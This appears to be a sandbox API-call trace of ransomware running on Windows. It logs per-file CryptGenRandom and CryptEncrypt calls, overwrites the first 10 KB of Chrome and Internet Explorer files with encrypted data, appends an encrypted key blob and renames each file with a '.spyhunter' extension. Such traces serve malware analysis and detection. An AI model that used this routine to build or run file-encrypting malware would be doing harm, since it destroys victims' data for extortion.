GetProcessHeap () returned 0x2c0000 [0122.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0122.603] GetProcessHeap () returned 0x2c0000 [0122.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04448 | out: hHeap=0x2c0000) returned 1 [0122.603] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8b8 | out: pbBuffer=0x248f8b8) returned 1 [0122.603] GetProcessHeap () returned 0x2c0000 [0122.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0122.603] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8b0*=0x30) returned 1 [0122.603] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledb32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.605] GetProcessHeap () returned 0x2c0000 [0122.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0122.605] GetProcessHeap () returned 0x2c0000 [0122.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03f68 | out: hHeap=0x2c0000) returned 1 [0122.606] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8b8 | out: pbBuffer=0x248f8b8) returned 1 [0122.606] GetProcessHeap () returned 0x2c0000 [0122.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0122.606] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8b0*=0x30) returned 1 [0122.606] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatl3.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdatl3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.608] GetProcessHeap () returned 0x2c0000 [0122.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0122.608] GetProcessHeap () returned 0x2c0000 [0122.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03c28 | out: hHeap=0x2c0000) returned 1 [0122.608] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8b0 | out: pbBuffer=0x248f8b0) returned 1 [0122.608] GetProcessHeap () returned 0x2c0000 [0122.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0122.608] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8a8*=0x30) returned 1 [0122.608] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaps.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.611] GetProcessHeap () returned 0x2c0000 [0122.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0122.611] GetProcessHeap () returned 0x2c0000 [0122.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03748 | out: hHeap=0x2c0000) returned 1 [0122.611] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8b0 | out: pbBuffer=0x248f8b0) returned 1 [0122.611] GetProcessHeap () returned 0x2c0000 [0122.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0122.611] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8a8*=0x30) returned 1 [0122.611] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaer.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaer.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.613] GetProcessHeap () returned 0x2c0000 [0122.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0122.613] GetProcessHeap () returned 0x2c0000 [0122.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e034d8 | out: hHeap=0x2c0000) returned 1 [0122.613] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8a8 | out: pbBuffer=0x248f8a8) returned 1 [0122.613] GetProcessHeap () returned 0x2c0000 [0122.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0122.613] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8a0*=0x30) returned 1 [0122.613] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.876] GetProcessHeap () returned 0x2c0000 [0122.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0122.876] GetProcessHeap () returned 0x2c0000 [0122.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee47f0 | out: hHeap=0x2c0000) returned 1 [0122.881] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8a0 | out: pbBuffer=0x248f8a0) returned 1 [0122.881] GetProcessHeap () returned 0x2c0000 [0122.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0122.881] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f898*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f898*=0x30) returned 1 [0122.881] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libglesv2.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\libglesv2.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0122.884] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libglesv2.dll") returned 80 [0122.884] StrStrW (lpFirst="libglesv2.dll", lpSrch=".txt") returned 0x0 [0122.884] GetProcessHeap () returned 0x2c0000 [0122.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0122.884] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f85c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f85c*=0x2800, lpOverlapped=0x0) returned 1 [0123.018] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.018] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f85c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f85c*=0x2800, lpOverlapped=0x0) returned 1 [0123.018] GetProcessHeap () returned 0x2c0000 [0123.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0123.018] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.018] WriteFile (in: hFile=0x17c, lpBuffer=0x248f89c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f85c, lpOverlapped=0x0 | out: lpBuffer=0x248f89c*, lpNumberOfBytesWritten=0x248f85c*=0x4, lpOverlapped=0x0) returned 1 [0123.091] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f85c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f85c*=0x30, lpOverlapped=0x0) returned 1 [0123.091] CloseHandle (hObject=0x17c) returned 1 [0123.091] GetProcessHeap () returned 0x2c0000 [0123.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0123.091] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libglesv2.dll.spyhunter") returned 90 [0123.091] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libglesv2.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\libglesv2.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libglesv2.dll.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\libglesv2.dll.spyhunter")) returned 1 [0123.092] GetProcessHeap () returned 0x2c0000 [0123.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0123.093] GetProcessHeap () returned 0x2c0000 [0123.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.093] GetProcessHeap () returned 0x2c0000 [0123.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa000 | out: hHeap=0x2c0000) returned 1 [0123.093] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8a0 | out: pbBuffer=0x248f8a0) returned 1 [0123.093] GetProcessHeap () returned 0x2c0000 [0123.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.093] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f898*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f898*=0x30) returned 1 [0123.093] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\snapshot_blob.bin" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\snapshot_blob.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0123.095] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\snapshot_blob.bin") returned 84 [0123.095] StrStrW (lpFirst="snapshot_blob.bin", lpSrch=".txt") returned 0x0 [0123.095] GetProcessHeap () returned 0x2c0000 [0123.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0123.095] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f85c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f85c*=0x2800, lpOverlapped=0x0) returned 1 [0123.153] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.153] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f85c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f85c*=0x2800, lpOverlapped=0x0) returned 1 [0123.153] GetProcessHeap () returned 0x2c0000 [0123.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0123.153] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.153] WriteFile (in: hFile=0x17c, lpBuffer=0x248f89c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f85c, lpOverlapped=0x0 | out: lpBuffer=0x248f89c*, lpNumberOfBytesWritten=0x248f85c*=0x4, lpOverlapped=0x0) returned 1 [0123.331] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f85c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f85c*=0x30, lpOverlapped=0x0) returned 1 [0123.331] CloseHandle (hObject=0x17c) returned 1 [0123.332] GetProcessHeap () returned 0x2c0000 [0123.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0123.332] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\snapshot_blob.bin.spyhunter") returned 94 [0123.332] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\snapshot_blob.bin" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\snapshot_blob.bin"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\snapshot_blob.bin.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\snapshot_blob.bin.spyhunter")) returned 1 [0123.333] GetProcessHeap () returned 0x2c0000 [0123.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0123.333] GetProcessHeap () returned 0x2c0000 [0123.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.334] GetProcessHeap () returned 0x2c0000 [0123.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eca980 | out: hHeap=0x2c0000) returned 1 [0123.334] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f898 | out: pbBuffer=0x248f898) returned 1 [0123.334] GetProcessHeap () returned 0x2c0000 [0123.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.334] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f890*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f890*=0x30) returned 1 [0123.334] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\drawing households.exe" (normalized: "c:\\program files (x86)\\java\\drawing households.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.334] GetProcessHeap () returned 0x2c0000 [0123.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.334] GetProcessHeap () returned 0x2c0000 [0123.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f267f0 | out: hHeap=0x2c0000) returned 1 [0123.336] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f890 | out: pbBuffer=0x248f890) returned 1 [0123.336] GetProcessHeap () returned 0x2c0000 [0123.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.336] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f888*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f888*=0x30) returned 1 [0123.336] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files (x86)\\internet explorer\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.340] GetProcessHeap () returned 0x2c0000 [0123.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.340] GetProcessHeap () returned 0x2c0000 [0123.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f26738 | out: hHeap=0x2c0000) returned 1 [0123.341] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f888 | out: pbBuffer=0x248f888) returned 1 [0123.342] GetProcessHeap () returned 0x2c0000 [0123.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.342] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f880*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f880*=0x30) returned 1 [0123.342] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files (x86)\\internet explorer\\signup\\install.ins"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0123.342] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins") returned 63 [0123.342] StrStrW (lpFirst="install.ins", lpSrch=".txt") returned 0x0 [0123.342] GetProcessHeap () returned 0x2c0000 [0123.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0123.343] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f844, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f844*=0x1cc, lpOverlapped=0x0) returned 1 [0123.344] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffe34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.344] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1cc, lpNumberOfBytesWritten=0x248f844, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f844*=0x1cc, lpOverlapped=0x0) returned 1 [0123.344] GetProcessHeap () returned 0x2c0000 [0123.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0123.344] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.344] WriteFile (in: hFile=0x17c, lpBuffer=0x248f884*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f844, lpOverlapped=0x0 | out: lpBuffer=0x248f884*, lpNumberOfBytesWritten=0x248f844*=0x4, lpOverlapped=0x0) returned 1 [0123.344] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f844, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f844*=0x30, lpOverlapped=0x0) returned 1 [0123.344] CloseHandle (hObject=0x17c) returned 1 [0123.344] GetProcessHeap () returned 0x2c0000 [0123.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0123.345] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins.spyhunter") returned 73 [0123.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files (x86)\\internet explorer\\signup\\install.ins"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins.spyhunter" (normalized: "c:\\program files (x86)\\internet explorer\\signup\\install.ins.spyhunter")) returned 1 [0123.346] GetProcessHeap () returned 0x2c0000 [0123.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0123.346] GetProcessHeap () returned 0x2c0000 [0123.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.346] GetProcessHeap () returned 0x2c0000 [0123.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfec0 | out: hHeap=0x2c0000) returned 1 [0123.346] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f888 | out: pbBuffer=0x248f888) returned 1 [0123.346] GetProcessHeap () returned 0x2c0000 [0123.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.346] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f880*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f880*=0x30) returned 1 [0123.346] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\pdm.dll" (normalized: "c:\\program files (x86)\\internet explorer\\pdm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.349] GetProcessHeap () returned 0x2c0000 [0123.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.349] GetProcessHeap () returned 0x2c0000 [0123.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bcc0 | out: hHeap=0x2c0000) returned 1 [0123.350] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f880 | out: pbBuffer=0x248f880) returned 1 [0123.350] GetProcessHeap () returned 0x2c0000 [0123.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.350] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f878*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f878*=0x30) returned 1 [0123.350] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll" (normalized: "c:\\program files (x86)\\internet explorer\\msdbg2.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.350] GetProcessHeap () returned 0x2c0000 [0123.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.350] GetProcessHeap () returned 0x2c0000 [0123.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bc08 | out: hHeap=0x2c0000) returned 1 [0123.350] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f880 | out: pbBuffer=0x248f880) returned 1 [0123.350] GetProcessHeap () returned 0x2c0000 [0123.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.350] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f878*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f878*=0x30) returned 1 [0123.350] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll" (normalized: "c:\\program files (x86)\\internet explorer\\jsprofilerui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.351] GetProcessHeap () returned 0x2c0000 [0123.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.351] GetProcessHeap () returned 0x2c0000 [0123.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfba0 | out: hHeap=0x2c0000) returned 1 [0123.351] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f878 | out: pbBuffer=0x248f878) returned 1 [0123.351] GetProcessHeap () returned 0x2c0000 [0123.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.351] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f870*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f870*=0x30) returned 1 [0123.351] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll" (normalized: "c:\\program files (x86)\\internet explorer\\jsprofilercore.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.351] GetProcessHeap () returned 0x2c0000 [0123.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.351] GetProcessHeap () returned 0x2c0000 [0123.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfd30 | out: hHeap=0x2c0000) returned 1 [0123.351] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f878 | out: pbBuffer=0x248f878) returned 1 [0123.351] GetProcessHeap () returned 0x2c0000 [0123.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.351] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f870*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f870*=0x30) returned 1 [0123.351] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll" (normalized: "c:\\program files (x86)\\internet explorer\\jsdebuggeride.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.352] GetProcessHeap () returned 0x2c0000 